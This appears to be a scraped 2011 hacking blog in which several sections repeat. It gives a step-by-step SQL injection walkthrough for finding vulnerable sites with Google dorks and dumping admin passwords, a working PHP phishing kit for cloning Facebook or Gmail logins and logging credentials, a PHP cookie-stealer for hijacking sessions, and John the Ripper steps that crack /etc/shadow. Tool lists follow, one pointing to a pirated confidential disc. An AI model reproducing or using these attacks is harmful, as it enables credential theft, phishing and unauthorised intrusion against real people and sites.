Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming.
In an effort to reproduce some advanced attacks and propagate it down , he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.
Installing Fast-Track:
make sure you have the latest version of Subversion
Open a terminal and type the following command (In Linux offcourse) :
The svn co simply means "check out" the latest version of Fast-Track, the /path-to-install/ is the directory you want to install Fast-Track.
If you want to update Fast-Track after you check out the files, simply type svn update, or use the Fast-Track menu to update.
When you first check out Fast-Track, there are a few modules that need to be installed, fortunately, Fast-Track comes with a setup file that helps you install the files needed. From the command line and in the Fast-Track menu, simply type:
Follow the guide for installing Fast-Track, note that the setup does NOT install Metasploit for you. If you don't have Metasploit installed, some applications will not work properly. Ensure that you enter the right path to Metasploit.
Once installation has finished, run Fast-Track, if it errors out saying you do not have the proper requirements, type yes to try a different type of install. If this still doesn't work you will need to manually install the requirements.
now to run Fast-Track type:
to run the web GUI mod:
Fast-Track HomePage: http://www.thepentest.com
hackiteasy
In an effort to reproduce some advanced attacks and propagate it down , he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.
Installing Fast-Track:
make sure you have the latest version of Subversion
Open a terminal and type the following command (In Linux offcourse) :
svn co http://svn.thepentest.com/fasttrack /path-to-install/
The svn co simply means "check out" the latest version of Fast-Track, the /path-to-install/ is the directory you want to install Fast-Track.
If you want to update Fast-Track after you check out the files, simply type svn update, or use the Fast-Track menu to update.
When you first check out Fast-Track, there are a few modules that need to be installed, fortunately, Fast-Track comes with a setup file that helps you install the files needed. From the command line and in the Fast-Track menu, simply type:
python setup.py install
Follow the guide for installing Fast-Track, note that the setup does NOT install Metasploit for you. If you don't have Metasploit installed, some applications will not work properly. Ensure that you enter the right path to Metasploit.
Once installation has finished, run Fast-Track, if it errors out saying you do not have the proper requirements, type yes to try a different type of install. If this still doesn't work you will need to manually install the requirements.
now to run Fast-Track type:
./fast-track.py to run the web GUI mod:
./ftguiOpen a browser and go to http://127.0.0.1:44444Fast-Track HomePage: http://www.thepentest.com
hackiteasy
Monday, January 17, 2011
Tutorial: sql injection
The hack starts as follows.
Finding vulnerable site
To find a vunerable site open google
Type in a dork like "inurl:index.php?id=" (without quotes) there are many other similar formats for finding such vulnerable pages.
Now click on any site like http://www.yoursite.com/index.php?id=786
Now to test if the siote is hackable or not add a ' at the end of the site.
If the site gives an error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1"
we can assume that it is vunerable. If not try some other site.
We have the vulnerable site now. So lets try with different sql injection queries.
Checking the number of columns:
To check the number of columns we do the following
http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below
http://www.site.com/index.php?id=-786 order by 2-- (no error)
similarly check
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- =>error
if we get an error at the 6 like "unknown column" that means there exists only 5 columns.
Finding vunerable columns:
To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786
Now the url becomes
http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--
after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 4 are vunerable and data can be retrieved from colums 2 and 4. This is important as we would see data on these columns only.
Finding Mysql version:
To find the sql version we replace 2 or 4 (or the bulnerable column in yor case) with @@version.
The URL would become-
http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--
After hitting enter the sql version appears on the page in the vulnerable column space
Lets assume we got 5.0.90-community-log on page which is sql version.
Getting Table names:
To get table names replace @@version in the url with table_name and add from information_schema.tables-- to the end.
The url now becomes
http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--
After hitting enter the page shows the tablenames.
Lets us assume we got something like this
comment,log,admin,news,news_comment,members.
To take over the site we data should be retrieved from admin table.As it seems the most favorable to contain all the passwords.
Getting the column names:
To get the column names from the table "admin" we do the following
http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--
Converting the tablename to ascii:
For the real hack above first we have to convert the admin table to ascii values. Convert the tablename to ascii here
http://www.getyourwebsitehere.com/jswb/t...ascii.html
The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;
Now remove &# and add a , between them
So now it is 97,100,109,105,110
Replace it in the place of ascii of the tablename
Now it becomes
http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--
You can now see something like
username pwd gender email on page
Getting username and password:
To get the username and password we use
http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.
At this point we see username and password on page.
The password may be in MD5 encrypted form, this can easilt be decrypted using the following converter-
http://www.md5decrypter.co.uk
This was a nice SQL injection hack tutorial. Please comment if you like the post.
Regards hackiteasy.com
Sunday, January 16, 2011
Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.
For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.
So now u have a hosting account so lets create a fake page-
First go to the target site. In your browser select Save As from the File menu and save the site on
your hardisk with name "login.htm" .
or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".
Now the second part of the hack-
Go to Notepad and copy this into it-
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
replace facebook.com with the URL you want the user to go after he clicks on submit button.
Save the page as fish.php
Now you need to edit the "login.htm" file we saves earlier. So go to that and open it with notepad.
now search for anyhtin like "action=" which has something with login. And replace the URl with "fish.php".
Also create a blank txt file with name "log.txt" . This file would be used to save your logins and passwords.
Now you are done,.
Go to your hosting account and upload all the files to your server.
Now go to the URL provided by ur host.
Like - http://g00glepage.t35.com/login.htm
And you would see the fake page as it is.
Now enter the username and password.
Check the log.txt file. The password and username you enterd previously would be saved in the log.txt file.
Here you have a working phishing page.
bu hackiteasy
Friday, January 14, 2011
Installing John The ripper on Linux machine
John the ripper is undoubtedly one of the best password cracking tool. People have been experiencing some problems with installing it. So here we bring out a tutorial on how to install the famous password cracker on a Linux machine.
This is the method to install and use john the ripper in fedora/ubuntu (and many other linux as well)..
1) Download john the ripper software
http://www.ziddu.com/download/6365223/jo...ar.gz.html
2) Extract it and then copy the text from
http://www.openwall.com/lists/john-users/2009/09/02/3
3) Save the copy text in john folder with john.patch.
4) Open terminal and go to john folder
cd Desktop/john-1.7.3.1
5) Now we have to patch our john software with following command
patch -Np1 -i john.patch
6) go to src folder
cd src
7) run this command
make linux-x86-sse2
8) cd .. and goto run folder cd run.
9) Run this commmand
./unshadow /etc/passwd /etc/shadow > filename
10) Finally run this command to crack password
./john filename
and here you have the ripper running.
by hackiteasy
This is the method to install and use john the ripper in fedora/ubuntu (and many other linux as well)..
1) Download john the ripper software
http://www.ziddu.com/download/6365223/jo...ar.gz.html
2) Extract it and then copy the text from
http://www.openwall.com/lists/john-users/2009/09/02/3
3) Save the copy text in john folder with john.patch.
4) Open terminal and go to john folder
cd Desktop/john-1.7.3.1
5) Now we have to patch our john software with following command
patch -Np1 -i john.patch
6) go to src folder
cd src
7) run this command
make linux-x86-sse2
8) cd .. and goto run folder cd run.
9) Run this commmand
./unshadow /etc/passwd /etc/shadow > filename
10) Finally run this command to crack password
./john filename
and here you have the ripper running.
by hackiteasy
Installing nessus on ubuntu
The totorial starts here-
Download Nessus Nessus-4.0.1-ubuntu810_amd64.deb for Ubuntu 9.04 from http://www.nessus.org.
dpkg -i Nessus-4.0.1-ubuntu810_amd64.debSelecting previously deselected package nessus.
(Reading database … 128086 files and directories currently installed.)
Unpacking nessus (from Nessus-4.0.1-ubuntu810_amd64.deb) …
Setting up nessus (4.0.1) …
nessusd (Nessus) 4.0.1. for Linux
(C) 1998 – 2009 Tenable Network Security, Inc.– Please run /opt/nessus/sbin/nessus-adduser to add a user
– Register your Nessus scanner at http://www.nessus.org/register/ to obtain
all the newest plugins
– You can start nessusd by typing /etc/init.d/nessusd startroot@testserver:~# /opt/nessus/sbin/nessus-adduser
Login : admin
Authentication (pass/cert) : [pass]
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y
User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.Please see the nessus-adduser manual for the rules syntaxEnter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)Login : admin
Password : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added
Register for home feed.
/opt/nessus/bin/nessus-fetch –register xxxx-xxxx-xxxx-xxxx-xxxxx
/etc/init.d/nessusd start
To run Nessus from the command line you use an option “q” that is for batch mode. This allows running from a terminal and without the GUI interface to the client. Handy if you would like to script or automate your scans.
Using batch mode the IP’s that are to be scanned are read from a file.
echo “192.168.0.1″ >> iptoscan.txt/opt/nessus/bin/nessus -q 127.0.0.1 1241 admin password iptoscan.txt scanresults2.html -T htm
Replace “admin password” in your command with the login and password you chose when you created the user using nessus-adduser.
~$ OpenVAS-Client –help
Usage:
OpenVAS-Client [OPTION...] – client for the OpenVAS security scannerHelp Options:
-?, –help Show help options
–help-all Show all help options
–help-gtk Show GTK+ OptionsApplication Options:
-v, –version Display version information
-n, –no-pixmap No pixmaps
-q, –batch-mode= Batch-mode scan
-c, –config-file=<.rcfile> Configuration file
-T, –output-type=[nbe|html|text|xml|tex] Output format
-V, –verbose Display status messages in batch mode
-p, –list-plugins Obtain list of plugins installed on the server
-P, –list-prefs Obtain list of server and plugin preferences
-i, –in-report= Input file (report conversion)
-o, –out-report= Output file (report conversion)
-x, –dont-check-ssl-cert Override SSL “paranoia” question preventing OpenVAS-Client from checking certificates
-S, –sqlize-output Issue SQL output for -p and -P (experimental)
-s, –list-sessions= List sessions
-R, –restore-session= Restore session
–display=DISPLAY X display to use
Please do comment if this has been helpful.
by hackiteasy
Hacking tools that every hacker must have
We(hackiteasy.com) present another list of the must hacking tools every hacker must have. These toolsmake the life of a hacker much easier and every n00b must first learn how to use these tools first.
AIRCRACK
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.
Site URL:
http://www.aircrack-ng.org/
BackTrack
BackTrack is a A Linux Distribution focused on penetration testing.
Site URL:
http://www.bactrack-linux.org
BarsWF
BarsWF is the worlds fastest md5 bruteforcing password cracker, just in case you didn't already know.
It combines using your computers processor with you graphics cards GPU for computing the largest amount of hashes as quickly as possible. It is not unheard of to get 100's of millions of hashes per second when using this application.
Prerequisites which really dont need to be mentioned are a processor with SSE2 instruction set, and any nvidia geforce 8 and up graphics card with CUDA support if you want the really fast one, otherwise most decently new nvidia graphics cards bought in the past 2 years should be able to work with this.
Site URL:
http://3.14.by/en/md5
BLOODSHED IDE
Bloodshed IDE is an Integrated Development Environment (IDE) for the C/C++ programming language.
Site URL:
http://www.bloodshed.net/devcpp.html
CAIN AND ABEL
Cain and Abel is a Windows password cracker, capable of cracking a variety of hashes, as well as arp poisoning, sniffing the network, etc.. to obtain those password hashes in the first place.
Site URL:
http://www.oxid.it/cain.html
CANVAS
Immunity's CANVAS makes available hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework to penetration testers and security professionals worldwide. To see CANVAS in action please see the movies at immunitysec.com
Supported Platforms and Installations
# Windows (requires Python & PyGTK)
# Linux
# MacOSX (requires PyGTK)
# All other Python environments such as mobile phones and commercial Unixes (command line version only supported, GUI may also be available)
Exploits
# currently over 400 exploits, an average of 4 exploits added every monthly release
# Immunity carefully selects vulnerabilities for inclusion as CANVAS exploits. Top priorities are high-value vulnerabilities such as remote, pre-authentication, and new vulnerabilities in mainstream software.
# Exploits span all common platforms and applications
Payload Options
# to provide maximum reliability, exploits always attempt to reuse socket
# if socket reuse is not suitable, connect-back is used
# subsequent MOSDEF session allows arbitrary code execution, and provides a listener shell for common actions (file management, screenshots, etc)
# bouncing and split-bouncing automatically available via MOSDEF
# adjustable covertness level
Ability to make Custom Exploits
# unique MOSDEF development environment allows rapid exploit development
Development
# CANVAS is a platform that is designed to allow easy development of other security products. Examples include Gleg, Ltd's VulnDisco and the Argeniss Ultimate 0day Exploits Pack.
Site URL:
http://www.immunitysec.com/products-canvas.shtml
CYGWIN
Cygwin is the next best thing to using Linux.
I personally do not use a windows box period, work, school, or other, unless I have Cygwin installed.
It's a large download, but once you get use to using it there's no turning back.
I have actually created a condensed copy that I carry around on my flash drive.
It comes complete with most Unix/Linux commands, to include the ability to compile things on the fly with gcc, perl, etc..
It has many useful things about it, but the only way to really see the extent of them is to use it yourself unless you like reading pages of technical data to help put you to sleep at night.
FYI...Last I checked it was currently managed by RedHat.
Site URL:
http://www.cygwin.com/
DBAN
DBAN- Short for Darik's Boot and Nuke, is a good utility for securely erasing contents of hard disk.
It uses encryption and re-writing over drives multiple times for a fairly secure deletion which makes if very difficult if not impossible to recover using forensics.
Site URL:
http://www.dban.org/about
FARONICS DEEP FREEZE
Faronics Deep Freeze helps eliminate workstation damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer—regardless of whether they are accidental or malicious—are never permanent. Deep Freeze provides immediate immunity from many of the problems that "He-Who-Must-Not-Be-Named." computers today—inevitable configuration drift, accidental system misconfiguration, malicious software activity, and incidental system degradation.
Deep Freeze ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift.
Site URL:
http://www.faronics.com/html/deepfreeze.asp
NEMESIS
Nemesis is a packet injector utility that is command line based and supports linux and windows.
Site URL:
http://www.packetfactory.net/projects/nemesis/
GEEKSQUAD MRI
GeekSquad MRI is the the Best Buy geek squad repair disc - Code Name MRI - for internal use only, confidential, and a trade secret. This is version 5.0.1.0 - the latest version. The disc has tools to help fix computers - it has AntiVirus, AntiSpyware, Disk Cleaner, Process List, Winsock Fix, etc, all in an attractive and quite usable interface!
Site URL:
At piratebay or google it.
SCAPY
Scapy is a packet manipulator used for crafting packets, sending packets, sniffing them etc. Also runs on Linux and Windows.
Site URL:
http://www.secdev.org/projects/scapy/
TRUECRYPT
TrueCrypt- Free open-source disk encryption software.
Site URL:
http://www.truecrypt.org
SKYPELOGVIEW
SkypeLogView reads the log files created by Skype application, and displays the details of incoming/outgoing calls, chat messages, and file transfers made by the specified Skype account. You can select one or more items from the logs list, and then copy them to the clipboard, or export them into text/html/csv/xml file.This utility works on any version of Windows starting from Windows 2000 and up to Windows 2008. You don't have to install Skype in order to use this utility. You only need the original log files created by skype, even if they are on an external drive.
Site URL:
http://www.nirsoft.net/utils/skype_log_view.html
PASSWORD FOX
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. This utility works under Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. Firefox should also be installed on your system in order to use this utility.
Site URL:
http://www.nirsoft.net/utils/passwordfox.html
NESSUS
Nessus has been around for a little more than a little while now and has gone from free to almost free to it's gonna cost ya.
I'm not really sure regarding the newest updates as I haven't used it since it lost it's freedom, but I will say it has plugins for everything under the sun!
It is mainly used for network and server scanning and has the ability to test and create a client/server connection between yourself and the host you're testing with.
Site URL:
http://www.nessus.org/nessus/
RAINBOW CRACK
RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique.
In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time mabait in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time mabait is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables.
Site URL:
http://www.antsight.com/zsl/rainbowcrack/
UNETBOOTIN
UNetbootin - An application to install an operating system to a flash drive or to a hard disk by either using the pre-downloaded iso file or by downloading the operating system through the application.
Site URL:
http://unetbootin.sourceforge.net/
VISUAL STUDIO 2010
Visual Studio 2010- A development environment, and programmers best friend when it comes to designing windows applications. A little pricey, but free for academic use under the MSDNAA.
Site URL:
http://www.microsoft.com/visualstudio/en-us
WINHEX
Winhex is a hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security. Also a advanced tool for everyday and emergency use.
Code: [Check Download Links]
http://www.x-ways.net/winhex/
WPE PRO
Winsock Packet Editor (WPE) Pro is a packet sniffing/editing tool which is generally used to hack multiplayer games. WPE Pro allows modification of data at TCP level. Using WPE Pro one can select a running process from the memory and modify the data sent by it before it reaches the destination. It can record packets from specific processes, then analyze the information. You can setup filters to modify the packets or even send them when you want in different intervals. WPE Pro could also be a useful tool for testing thick client applications or web applications which use applets to establish socket connections on non http ports.
Site URL:
http://wpepro.net/
IDP
Interactive Disassembler Pro (IDP) . Supports 80x86 binaries and FLIRT, a unique Fast Library Identification and Recognition Technology that automagically recognizes standard compiler library calls. Widely used in COTS validation and hostile code analysis.
In short it's what we like to call the "Reverse Engineer's Wet Dream".
Site URL:
http://www.hex-rays.com/idapro/
HPING
Hping is a command-line TCP/IP assembler that supports TCP, ICMP, UDP and RAW-IP protocols.
also works on Unix systems, Windows, Sun and MacOS's.
Site URL:
http://www.hping.org/
JOHN THE RIPPER
John the Ripper- free open-source software (if you want to buy you can always get the pro version)
John has been, and continues to still be, the most famous and most widely used password cracker for linux/unix systems.
Things everyone likes about it:
It's fast, it has support for cracking a lot of different but commonly used hash types, and it's able to run on just about anything.
Site URL:
http://www.openwall.com/john/
AIRCRACK
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.
Site URL:
http://www.aircrack-ng.org/
BackTrack
BackTrack is a A Linux Distribution focused on penetration testing.
Site URL:
http://www.bactrack-linux.org
BarsWF
BarsWF is the worlds fastest md5 bruteforcing password cracker, just in case you didn't already know.
It combines using your computers processor with you graphics cards GPU for computing the largest amount of hashes as quickly as possible. It is not unheard of to get 100's of millions of hashes per second when using this application.
Prerequisites which really dont need to be mentioned are a processor with SSE2 instruction set, and any nvidia geforce 8 and up graphics card with CUDA support if you want the really fast one, otherwise most decently new nvidia graphics cards bought in the past 2 years should be able to work with this.
Site URL:
http://3.14.by/en/md5
BLOODSHED IDE
Bloodshed IDE is an Integrated Development Environment (IDE) for the C/C++ programming language.
Site URL:
http://www.bloodshed.net/devcpp.html
CAIN AND ABEL
Cain and Abel is a Windows password cracker, capable of cracking a variety of hashes, as well as arp poisoning, sniffing the network, etc.. to obtain those password hashes in the first place.
Site URL:
http://www.oxid.it/cain.html
CANVAS
Immunity's CANVAS makes available hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework to penetration testers and security professionals worldwide. To see CANVAS in action please see the movies at immunitysec.com
Supported Platforms and Installations
# Windows (requires Python & PyGTK)
# Linux
# MacOSX (requires PyGTK)
# All other Python environments such as mobile phones and commercial Unixes (command line version only supported, GUI may also be available)
Exploits
# currently over 400 exploits, an average of 4 exploits added every monthly release
# Immunity carefully selects vulnerabilities for inclusion as CANVAS exploits. Top priorities are high-value vulnerabilities such as remote, pre-authentication, and new vulnerabilities in mainstream software.
# Exploits span all common platforms and applications
Payload Options
# to provide maximum reliability, exploits always attempt to reuse socket
# if socket reuse is not suitable, connect-back is used
# subsequent MOSDEF session allows arbitrary code execution, and provides a listener shell for common actions (file management, screenshots, etc)
# bouncing and split-bouncing automatically available via MOSDEF
# adjustable covertness level
Ability to make Custom Exploits
# unique MOSDEF development environment allows rapid exploit development
Development
# CANVAS is a platform that is designed to allow easy development of other security products. Examples include Gleg, Ltd's VulnDisco and the Argeniss Ultimate 0day Exploits Pack.
Site URL:
http://www.immunitysec.com/products-canvas.shtml
CYGWIN
Cygwin is the next best thing to using Linux.
I personally do not use a windows box period, work, school, or other, unless I have Cygwin installed.
It's a large download, but once you get use to using it there's no turning back.
I have actually created a condensed copy that I carry around on my flash drive.
It comes complete with most Unix/Linux commands, to include the ability to compile things on the fly with gcc, perl, etc..
It has many useful things about it, but the only way to really see the extent of them is to use it yourself unless you like reading pages of technical data to help put you to sleep at night.
FYI...Last I checked it was currently managed by RedHat.
Site URL:
http://www.cygwin.com/
DBAN
DBAN- Short for Darik's Boot and Nuke, is a good utility for securely erasing contents of hard disk.
It uses encryption and re-writing over drives multiple times for a fairly secure deletion which makes if very difficult if not impossible to recover using forensics.
Site URL:
http://www.dban.org/about
FARONICS DEEP FREEZE
Faronics Deep Freeze helps eliminate workstation damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer—regardless of whether they are accidental or malicious—are never permanent. Deep Freeze provides immediate immunity from many of the problems that "He-Who-Must-Not-Be-Named." computers today—inevitable configuration drift, accidental system misconfiguration, malicious software activity, and incidental system degradation.
Deep Freeze ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift.
Site URL:
http://www.faronics.com/html/deepfreeze.asp
NEMESIS
Nemesis is a packet injector utility that is command line based and supports linux and windows.
Site URL:
http://www.packetfactory.net/projects/nemesis/
GEEKSQUAD MRI
GeekSquad MRI is the the Best Buy geek squad repair disc - Code Name MRI - for internal use only, confidential, and a trade secret. This is version 5.0.1.0 - the latest version. The disc has tools to help fix computers - it has AntiVirus, AntiSpyware, Disk Cleaner, Process List, Winsock Fix, etc, all in an attractive and quite usable interface!
Site URL:
At piratebay or google it.
SCAPY
Scapy is a packet manipulator used for crafting packets, sending packets, sniffing them etc. Also runs on Linux and Windows.
Site URL:
http://www.secdev.org/projects/scapy/
TRUECRYPT
TrueCrypt- Free open-source disk encryption software.
Site URL:
http://www.truecrypt.org
SKYPELOGVIEW
SkypeLogView reads the log files created by Skype application, and displays the details of incoming/outgoing calls, chat messages, and file transfers made by the specified Skype account. You can select one or more items from the logs list, and then copy them to the clipboard, or export them into text/html/csv/xml file.This utility works on any version of Windows starting from Windows 2000 and up to Windows 2008. You don't have to install Skype in order to use this utility. You only need the original log files created by skype, even if they are on an external drive.
Site URL:
http://www.nirsoft.net/utils/skype_log_view.html
PASSWORD FOX
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. This utility works under Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. Firefox should also be installed on your system in order to use this utility.
Site URL:
http://www.nirsoft.net/utils/passwordfox.html
NESSUS
Nessus has been around for a little more than a little while now and has gone from free to almost free to it's gonna cost ya.
I'm not really sure regarding the newest updates as I haven't used it since it lost it's freedom, but I will say it has plugins for everything under the sun!
It is mainly used for network and server scanning and has the ability to test and create a client/server connection between yourself and the host you're testing with.
Site URL:
http://www.nessus.org/nessus/
RAINBOW CRACK
RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique.
In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time mabait in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time mabait is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables.
Site URL:
http://www.antsight.com/zsl/rainbowcrack/
UNETBOOTIN
UNetbootin - An application to install an operating system to a flash drive or to a hard disk by either using the pre-downloaded iso file or by downloading the operating system through the application.
Site URL:
http://unetbootin.sourceforge.net/
VISUAL STUDIO 2010
Visual Studio 2010- A development environment, and programmers best friend when it comes to designing windows applications. A little pricey, but free for academic use under the MSDNAA.
Site URL:
http://www.microsoft.com/visualstudio/en-us
WINHEX
Winhex is a hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security. Also a advanced tool for everyday and emergency use.
Code: [Check Download Links]
http://www.x-ways.net/winhex/
WPE PRO
Winsock Packet Editor (WPE) Pro is a packet sniffing/editing tool which is generally used to hack multiplayer games. WPE Pro allows modification of data at TCP level. Using WPE Pro one can select a running process from the memory and modify the data sent by it before it reaches the destination. It can record packets from specific processes, then analyze the information. You can setup filters to modify the packets or even send them when you want in different intervals. WPE Pro could also be a useful tool for testing thick client applications or web applications which use applets to establish socket connections on non http ports.
Site URL:
http://wpepro.net/
IDP
Interactive Disassembler Pro (IDP) . Supports 80x86 binaries and FLIRT, a unique Fast Library Identification and Recognition Technology that automagically recognizes standard compiler library calls. Widely used in COTS validation and hostile code analysis.
In short it's what we like to call the "Reverse Engineer's Wet Dream".
Site URL:
http://www.hex-rays.com/idapro/
HPING
Hping is a command-line TCP/IP assembler that supports TCP, ICMP, UDP and RAW-IP protocols.
also works on Unix systems, Windows, Sun and MacOS's.
Site URL:
http://www.hping.org/
JOHN THE RIPPER
John the Ripper- free open-source software (if you want to buy you can always get the pro version)
John has been, and continues to still be, the most famous and most widely used password cracker for linux/unix systems.
Things everyone likes about it:
It's fast, it has support for cracking a lot of different but commonly used hash types, and it's able to run on just about anything.
Site URL:
http://www.openwall.com/john/
Thursday, January 13, 2011
Session hijacking or cookie stealing using php and javascript
In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).
Here we show how you can hack a session using javascript and php.
What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.
What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.
PHP Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)
Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.
